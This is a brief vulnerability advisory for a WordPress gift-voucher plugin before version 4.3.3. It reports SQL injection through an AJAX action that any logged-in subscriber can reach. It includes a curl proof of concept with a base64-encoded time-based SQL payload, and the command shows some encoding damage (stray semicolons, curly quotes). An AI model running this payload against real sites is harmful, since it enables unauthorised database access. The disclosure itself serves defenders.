The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber
curl “http://$TARGET_HOST/wp-admin/admin-ajax.php” --data “action=wpgv_doajax_voucher_pdf_save_func&nonce;=af77cd5581&template;=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying;_for=&for;=&from;=&value;=&message;=&code;=&shipping;=&shipping;_email=&firstname;=&lastname;=&email;=&address;=&pincode;=&shipping;_method=&paymentmethod;=”
CPE | Name | Operator | Version |
---|---|---|---|
gift-voucher | lt | 4.3.3 |